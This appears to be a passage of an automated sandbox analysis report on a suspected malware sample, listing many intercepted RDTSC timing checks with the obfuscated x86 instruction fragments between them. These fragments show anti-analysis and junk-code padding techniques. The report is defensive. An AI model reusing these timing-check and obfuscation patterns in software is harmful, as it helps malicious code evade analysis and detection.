Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BDBB second address: C2BE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, edx 0x0000000c push 00000000h 0x0000000e movzx esi, bx 0x00000011 push F66337FCh 0x00000016 jmp 00007FA22C835FABh 0x0000001b add dword ptr [esp], 099CC884h 0x00000022 push 00000003h 0x00000024 push esi 0x00000025 mov dword ptr [ebp+122D268Ah], edi 0x0000002b pop esi 0x0000002c push 00000000h 0x0000002e add si, 4E84h 0x00000033 push 00000003h 0x00000035 mov dword ptr [ebp+122D313Eh], ecx 0x0000003b push 9E807307h 0x00000040 jne 00007FA22C835FC1h 0x00000046 add dword ptr [esp], 217F8CF9h 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FA22C835FA8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 mov ecx, dword ptr [ebp+122D1B7Bh] 0x0000006d mov dword ptr [ebp+122D1B4Bh], ebx 0x00000073 lea ebx, dword ptr [ebp+12450ADAh] 0x00000079 sub dword ptr [ebp+122D1B92h], ecx 0x0000007f xchg eax, ebx 0x00000080 jmp 00007FA22C835FB4h 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 push esi 0x00000089 push edx 0x0000008a pop edx 0x0000008b pop esi 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BFA2 second address: C2BFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BFA8 second address: C2BFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2BFAC second address: C2BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jng 00007FA22C516E3Ah 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA22C516E43h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B389 second address: C4B38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B38F second address: C4B3A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B3A5 second address: C4B3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B540 second address: C4B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA22C516E47h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B55C second address: C4B561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B561 second address: C4B567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B82D second address: C4B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FAEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B845 second address: C4B858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA22C516E36h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jng 00007FA22C516E36h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B858 second address: C4B86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B86E second address: C4B872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B872 second address: C4B876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B876 second address: C4B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B9EF second address: C4BA15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FAFh 0x00000009 jmp 00007FA22C835FB3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCFA second address: C4BD46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E48h 0x00000007 jmp 00007FA22C516E46h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E46h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE81 second address: C4BE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FA22C835FAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE95 second address: C4BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE9B second address: C4BEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BEA0 second address: C4BECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007FA22C516E49h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BECA second address: C4BED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3F5C7 second address: C3F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C036 second address: C4C03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CA19 second address: C4CA53 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA22C516E59h 0x00000008 jmp 00007FA22C516E42h 0x0000000d jmp 00007FA22C516E41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FA22C516E36h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21925 second address: C2193C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA22C835FB2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5159A second address: C515A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA22C516E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C53640 second address: C53645 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C53C0F second address: C53C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C53E1B second address: C53E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C50F second address: C5C513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C513 second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B9C9 second address: C5B9E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FA22C516E3Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FA22C516E36h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B9E5 second address: C5BA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f js 00007FA22C835FA6h 0x00000015 jmp 00007FA22C835FABh 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5BDCE second address: C5BE28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FA22C516E49h 0x0000000f jnl 00007FA22C516E47h 0x00000015 popad 0x00000016 push ecx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jmp 00007FA22C516E41h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C0D0 second address: C5C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C0DC second address: C5C0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA22C516E3Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E2CD second address: C5E309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C835FB9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E309 second address: C5E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E30F second address: C5E313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E313 second address: C5E37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jo 00007FA22C516E3Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edx 0x00000019 pop ecx 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA22C516E38h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 jg 00007FA22C516E37h 0x0000003b push 3F57603Fh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FA22C516E43h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5E792 second address: C5E7B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA22C835FB7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5EA8A second address: C5EA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5EF6F second address: C5EF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA22C835FA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov dword ptr [esp], ebx 0x0000000f mov di, bx 0x00000012 push eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F0D8 second address: C5F0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA22C516E38h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F0E8 second address: C5F0ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F1BA second address: C5F1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F421 second address: C5F425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F425 second address: C5F42F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F42F second address: C5F442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FAFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F442 second address: C5F462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F539 second address: C5F53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F53D second address: C5F59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA22C516E38h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb edi, 459D9E47h 0x00000028 mov esi, dword ptr [ebp+122D187Bh] 0x0000002e xchg eax, ebx 0x0000002f jnc 00007FA22C516E44h 0x00000035 jmp 00007FA22C516E3Eh 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d jmp 00007FA22C516E3Eh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F59A second address: C5F5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA22C835FA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FB0C second address: C5FB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA22C516E47h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FA22C516E38h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA22C516E3Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FB41 second address: C5FB45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FB45 second address: C5FB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA22C516E38h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov esi, dword ptr [ebp+122D2A22h] 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d movsx edi, dx 0x00000030 call 00007FA22C516E3Dh 0x00000035 mov ax, 1700h 0x00000039 pop ecx 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jo 00007FA22C516E38h 0x00000044 push edx 0x00000045 pop edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FB96 second address: C5FBA0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C604F9 second address: C60511 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C516E3Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6203C second address: C62057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62B27 second address: C62B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C627DD second address: C627E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62B2D second address: C62B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C627E2 second address: C627F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64664 second address: C64668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64668 second address: C64672 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64672 second address: C64691 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C516E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FA22C516E36h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 jnp 00007FA22C516E3Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C64CA0 second address: C64CC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FA8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1EF0h], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2F3Dh], eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007FA22C835FA6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69C69 second address: C69C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69C84 second address: C69C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69C89 second address: C69CA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FA22C516E36h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA22C516E3Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C654C8 second address: C654E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B488 second address: C6B4D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+12472552h], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FA22C516E38h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov ebx, edi 0x00000030 push 00000000h 0x00000032 mov ebx, 235F611Fh 0x00000037 push eax 0x00000038 push ecx 0x00000039 jc 00007FA22C516E3Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D44A second address: C6D450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F443 second address: C6F4EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA22C516E47h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D26D5h], ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA22C516E38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f call 00007FA22C516E44h 0x00000034 mov dword ptr [ebp+1245A2CDh], ebx 0x0000003a pop edi 0x0000003b mov bh, ch 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FA22C516E38h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 jns 00007FA22C516E3Ah 0x0000005f push eax 0x00000060 pushad 0x00000061 push edx 0x00000062 jmp 00007FA22C516E48h 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F4EC second address: C6F4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C67E89 second address: C67E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B6F9 second address: C6B719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C835FB3h 0x00000012 rdtsc
